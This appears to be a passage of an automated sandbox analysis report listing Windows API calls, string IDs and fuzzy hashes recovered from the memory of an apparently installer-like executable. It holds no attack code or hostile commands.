• GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1C8
• 73E98830.GDI32(?,00000000,00000000,0041C20A,?,?), ref: 0041C1F0
• 73E9A480.USER32(?,?,0041C20A,?,?), ref: 0041C1FD
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: E98830$A480A570BitsE922FocusObject
• String ID:
• API String ID: 2688936647-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetSystemMetrics.USER32(0000000E), ref: 00418C80
• GetSystemMetrics.USER32(0000000D), ref: 00418C88
• 6F9C2980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C8E
  • Part of subcall function 004099C0: 6F9BC400.COMCTL32(0049B628,000000FF,00000000,00418CBC,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099C4
• 6FA2CB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CDE
• 6FA2C740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CE9
• 6FA2CB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000), ref: 00418CFC
• 6F9C0860.COMCTL32(0049B628,00418D1F,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E), ref: 00418D12
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: MetricsSystem$C0860C2980C400C740
• String ID:
• API String ID: 624341609-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004837A4), ref: 00483789
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                                                                                                                                                                                                                  • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 47109696-2530820420
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A570.USER32(00000000,?,?,00000000), ref: 00494EE9
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00494F0B
                                                                                                                                                                                                                                                                                                                                                                  • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00495489), ref: 00494F1F
                                                                                                                                                                                                                                                                                                                                                                  • GetTextMetricsA.GDI32(00000000,?), ref: 00494F41
                                                                                                                                                                                                                                                                                                                                                                  • 73E9A480.USER32(00000000,00000000,00494F6B,00494F64,?,00000000,?,?,00000000), ref: 00494F5E
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00494F16
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1435929781-222967699
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                                                                                                                                                                                                                                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                                                                                                                                                                                                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                                                                                                                                                                                                                                                                                                                  • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                                                                                                                                                                                                                                                                                                                  • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: ObjectSelect$Delete$Stretch
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1458357782-0
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetCursorPos.USER32 ref: 004233BF
                                                                                                                                                                                                                                                                                                                                                                  • WindowFromPoint.USER32(?,?), ref: 004233CC
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233DA
                                                                                                                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 004233E1
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233FA
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423411
                                                                                                                                                                                                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 00423423
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1770779139-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 219e0d69ac6b6a38dcb61baa39fbc914f783b163521ae56cddb293ea60412e1c
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E601D42230472036D6217B795C86E2F26A8CFC5B15F50457FB649BB283DA3D8C0063BD
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32.dll), ref: 00494D0C
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00494D19
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00494D26
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                                                                                                                  • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 667068680-2254406584
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0cb39cd026c5cfa5de683a7a06027fca95da1476d0954c2123b34056c2a6665f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 42226921e916c2e61715a17367c32eae2b2292ab525ca03b869d6a68ec0a34c4
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0cb39cd026c5cfa5de683a7a06027fca95da1476d0954c2123b34056c2a6665f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6CF0F69AB41B1466DA2025B68C81F7B698CCFD1B71F050337BE04A7382ED9D8D0642AD
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ISCryptGetVersion), ref: 0045D4F5
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ArcFourInit), ref: 0045D505
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ArcFourCrypt), ref: 0045D515
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 190572456-508647305
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cbbf728949466433ef1b5e6beef4c759beeb6f0ef4629b40a2ffa63b94b95771
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2c2546d05897d0e560449e180de6b9da44e6f0241588afb6de3da162f6531889
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cbbf728949466433ef1b5e6beef4c759beeb6f0ef4629b40a2ffa63b94b95771
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AF012F0940704EBEB18DFB6BCC67623695ABD531AF14C137A404A51A2E778044CCE1D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressInit), ref: 0045D9F5
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompress), ref: 0045DA05
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,BZ2_bzDecompressEnd), ref: 0045DA15
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 190572456-212574377
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 39adaa992061ea415b724a34e3f195d2ac2f2f2bcdc0c79ba91dc79f0f5f7918
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: e47ea2fb967bc5a05fa6d8d3c64fcba096cc564050e4d812c51f788cc71ed1ca
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 39adaa992061ea415b724a34e3f195d2ac2f2f2bcdc0c79ba91dc79f0f5f7918
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2BF030B0D05300DFEB24DFB29CC372336959BA4316F14803B9A0D96267D278088CCE2C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(oleacc.dll,?,0044F099), ref: 0044C7FB
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,LresultFromObject), ref: 0044C80C
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CreateStdAccessibleObject), ref: 0044C81C
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                                                                                                  • String ID: CreateStdAccessibleObject$LresultFromObject$oleacc.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2238633743-1050967733
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: ca03f8450237969495d81090995d2e77d5b4462fea94ff8caee62dbd4a4d12fe
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: d5a6e329c062b47ae4ba9e11e7719f1ec1b45dd3e70fac445fdcae0b1af11dcb
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ca03f8450237969495d81090995d2e77d5b4462fea94ff8caee62dbd4a4d12fe
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64F0FE70246305CAFB50BBB5FDC67223694E3A4B0AF18137BE40156192D7BC4444CF4C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,004985F4), ref: 00478B42
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478B4F
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478B5F
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                                                                                                                  • String ID: VerSetConditionMask$VerifyVersionInfoW$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 667068680-222143506
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 01ec4f011cdcf02bc2823bdc62d0ce7d0e1be1f03beeb802c6eb5433be4981a1
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8ade474bf949b7c868f23be577f60042bf37b8b7e1302e6d2b868e4e2d48ad49
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 01ec4f011cdcf02bc2823bdc62d0ce7d0e1be1f03beeb802c6eb5433be4981a1
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4C0E9F0AC1740EEAA00E7F15CDAD762558D514B34724943F754DAA193D97D58044A2C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• GetFocus.USER32 ref: 0041B58E
• 73E9A570.USER32(?,00000000,0041B668,?,?,?,?), ref: 0041B59A
• 73EA4620.GDI32(?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5B6
• 73ECE680.GDI32(?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668,?,?,?,?), ref: 0041B5D3
• 73ECE680.GDI32(?,00000000,00000008,?,?,00000000,00000008,?,?,00000068,00000000,0041B63C,?,?,00000000,0041B668), ref: 0041B5EA
• 73E9A480.USER32(?,?,0041B643,?,?), ref: 0041B636
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
Similarity
• API ID: E680$A4620A480A570Focus
• String ID:
• API String ID: 2226671993-0
• Opcode ID: 5d7c3ba993e5eebd83af6d17b2c287e498e3d287d4e0c623dc28ca4d995b2802
• Instruction ID: 7d41d09f6123fe0998bcf531a8d6f09bc5b1e179d78523dd82c4b1b978091a2c
• Opcode Fuzzy Hash: 5d7c3ba993e5eebd83af6d17b2c287e498e3d287d4e0c623dc28ca4d995b2802
• Instruction Fuzzy Hash: 7E41D571A04254AFDB10DFA9C886EAFBBB4EB55704F1484AAF500EB351D3389D11CBA5
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetLastError.KERNEL32(00000057,00000000,0045D47C,?,?,?,?,00000000), ref: 0045D41B
• SetLastError.KERNEL32(00000000,00000002,?,?,?,0045D4E8,?,00000000,0045D47C,?,?,?,?,00000000), ref: 0045D45A
Strings
Memory Dump Source
• Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
